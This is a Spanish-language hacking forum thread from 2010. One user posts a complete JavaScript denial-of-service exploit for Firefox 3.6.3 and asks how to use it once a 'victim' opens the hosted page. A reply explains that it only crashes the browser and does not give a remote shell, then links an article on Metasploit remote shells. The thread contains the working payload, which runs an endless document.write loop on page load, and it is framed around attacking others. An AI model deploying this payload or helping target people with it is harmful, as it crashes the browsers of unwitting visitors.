Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: 777Rubenix777 en 18 Septiembre 2010, 18:15 pm



Título: Como utilizo este sploit
Publicado por: 777Rubenix777 en 18 Septiembre 2010, 18:15 pm
Código:
================================
Mozilla Firefox 3.6.3 Remote Dos
================================


# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:Mozilla Firefox 3.6.3 Remote Dos
# Software Link:http://www.mozilla-europe.org/es/firefox/
# Version: v3.6.3
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____    _____                      _ _         
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Lo Guardamos como un html y lo subimos algun host

Exploit
-----------------------------------------

<body onload="javascript:bufov();"></body>
 
<script>
 
function bufov() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}
 
}
 
</script>



# Inj3ct0r.com [2010-06-16]

Hola,  quería saber como puedo utilizar este exploit... He creado un servidor apache y en el index.html lo he editado y he puesto el código del exploit que pone ... pero una vez que la victima abra el exploit ¿¿¿que debo hacer??? Se supone que es para conseguir una consola remota(al menos es lo que dice).
Muchas gracias!!!


Título: Re: Como utilizo este sploit
Publicado por: Shell Root en 18 Septiembre 2010, 18:31 pm
Donde se supongo que dice: "conseguir una consola remota". Eso es para provocar un DoS en el navegador remoto, que es muy diferente a obtener una consola remota, además esta hecho en javascript, tampoco se puede tirar a conseguir tanto con él.


Título: Re: Como utilizo este sploit
Publicado por: 777Rubenix777 en 18 Septiembre 2010, 18:43 pm
Donde se supongo que dice: "conseguir una consola remota". Eso es para provocar un DoS en el navegador remoto, que es muy diferente a obtener una consola remota, además esta hecho en javascript, tampoco se puede tirar a conseguir tanto con él.

Ok... aora creo que lo entiendo mejor...

Y por cierto hay exploits que consigan hacer consolas remotas?


Título: Re: Como utilizo este sploit
Publicado por: Shell Root en 18 Septiembre 2010, 18:46 pm
Seh, :http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un_09.html


Título: Re: Como utilizo este sploit
Publicado por: 777Rubenix777 en 18 Septiembre 2010, 18:52 pm
Muchas gracias!!